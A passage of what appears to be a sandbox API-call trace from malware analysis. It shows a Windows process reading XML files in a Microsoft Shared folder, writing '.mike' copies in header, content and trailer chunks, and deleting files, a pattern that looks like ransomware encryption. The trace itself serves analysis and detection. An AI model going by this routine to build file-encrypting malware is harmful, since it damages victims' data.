lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0045.487] CloseHandle (hObject=0x264) returned 1 [0045.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0045.488] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), fInfoLevelId=0x0, lpFileInformation=0x211d6d4 | out: lpFileInformation=0x211d6d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe7269b, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe7269b, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe7269b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x24f)) returned 1 [0045.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0045.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0045.488] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.488] GetFileType (hFile=0x264) returned 0x1 [0045.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0045.488] GetFileType (hFile=0x264) returned 0x1 [0045.488] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0045.488] ReadFile (in: hFile=0x264, lpBuffer=0x211ed20, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x211ed20*, lpNumberOfBytesRead=0x2af080*=0x24f, lpOverlapped=0x0) returned 1 [0045.489] CloseHandle (hObject=0x264) returned 1 [0045.490] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", lpFilePart=0x0) returned 0x51 [0045.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.490] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.490] GetFileType (hFile=0x264) returned 0x1 [0045.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.490] GetFileType (hFile=0x264) returned 0x1 [0045.490] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0045.490] WriteFile (in: hFile=0x264, lpBuffer=0x212299c*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x212299c*, lpNumberOfBytesWritten=0x2af074*=0x250, lpOverlapped=0x0) returned 1 [0045.490] CloseHandle (hObject=0x264) returned 1 [0045.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", lpFilePart=0x0) returned 0x51 [0045.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0045.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.491] GetFileType (hFile=0x264) returned 0x1 [0045.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0045.491] GetFileType (hFile=0x264) returned 0x1 [0045.492] WriteFile (in: hFile=0x264, lpBuffer=0x2125bd0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2125bd0*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0045.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.493] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", lpFilePart=0x0) returned 0x51 [0045.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.493] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe54e06c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe54e06c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe552c980, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x470)) returned 1 [0045.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.493] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.493] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", lpFilePart=0x0) returned 0x51 [0045.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.493] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x212738c | out: lpFileInformation=0x212738c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe54e06c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe54e06c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe552c980, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x470)) returned 1 [0045.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.493] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.493] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", dwFileAttributes=0x80) returned 0 [0045.494] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.494] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", lpFilePart=0x0) returned 0x51 [0045.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0045.494] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe54e06c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe54e06c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe552c980, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x470)) returned 1 [0045.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0045.494] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml", lpFilePart=0x0) returned 0x4c [0045.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike", lpFilePart=0x0) returned 0x51 [0045.495] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.mike")) returned 1 [0045.496] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.496] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.496] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0045.496] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.497] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0045.497] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.497] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0045.498] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.498] GetFileType (hFile=0x264) returned 0x1 [0045.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0045.498] GetFileType (hFile=0x264) returned 0x1 [0045.498] CloseHandle (hObject=0x264) returned 1 [0045.498] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.498] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.498] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0045.498] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0045.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.498] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), fInfoLevelId=0x0, lpFileInformation=0x21294d4 | out: lpFileInformation=0x21294d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90061861, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x90061861, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xcf)) returned 1 [0045.499] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.499] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.499] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.499] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), fInfoLevelId=0x0, lpFileInformation=0x21297ec | out: lpFileInformation=0x21297ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90061861, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x90061861, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xcf)) returned 1 [0045.499] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.499] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.499] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", lpFilePart=0x0) returned 0x4d [0045.499] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.499] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.499] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.499] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.499] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.499] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.499] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", lpFilePart=0x0) returned 0x4d [0045.499] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.499] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.500] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", lpFilePart=0x0) returned 0x4d [0045.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.500] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.500] GetFileType (hFile=0x264) returned 0x1 [0045.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.500] GetFileType (hFile=0x264) returned 0x1 [0045.500] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0045.500] WriteFile (in: hFile=0x264, lpBuffer=0x212a654*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x212a654*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0045.501] CloseHandle (hObject=0x264) returned 1 [0045.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0045.501] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), fInfoLevelId=0x0, lpFileInformation=0x212a164 | out: lpFileInformation=0x212a164*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90061861, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x90061861, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x90061861, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xcf)) returned 1 [0045.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0045.501] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", lpFilePart=0x0) returned 0x48 [0045.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0045.501] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.502] GetFileType (hFile=0x264) returned 0x1 [0045.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0045.502] GetFileType (hFile=0x264) returned 0x1 [0045.502] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0045.502] ReadFile (in: hFile=0x264, lpBuffer=0x212b778, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x212b778*, lpNumberOfBytesRead=0x2af080*=0xcf, lpOverlapped=0x0) returned 1 [0045.503] CloseHandle (hObject=0x264) returned 1 [0045.503] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", lpFilePart=0x0) returned 0x4d [0045.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.503] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.503] GetFileType (hFile=0x264) returned 0x1 [0045.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.503] GetFileType (hFile=0x264) returned 0x1 [0045.503] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0045.504] WriteFile (in: hFile=0x264, lpBuffer=0x212e998*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x212e998*, lpNumberOfBytesWritten=0x2af074*=0xd0, lpOverlapped=0x0) returned 1 [0045.504] CloseHandle (hObject=0x264) returned 1 [0045.505] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike", lpFilePart=0x0) returned 0x4d [0045.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0045.505] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.505] GetFileType (hFile=0x264) returned 0x1 [0045.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0045.505] GetFileType (hFile=0x264) returned 0x1 [0045.506] WriteFile (in: hFile=0x264, lpBuffer=0x2131bbc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2131bbc*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0045.506] CloseHandle (hObject=0x264) returned 1 [0045.507] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml", 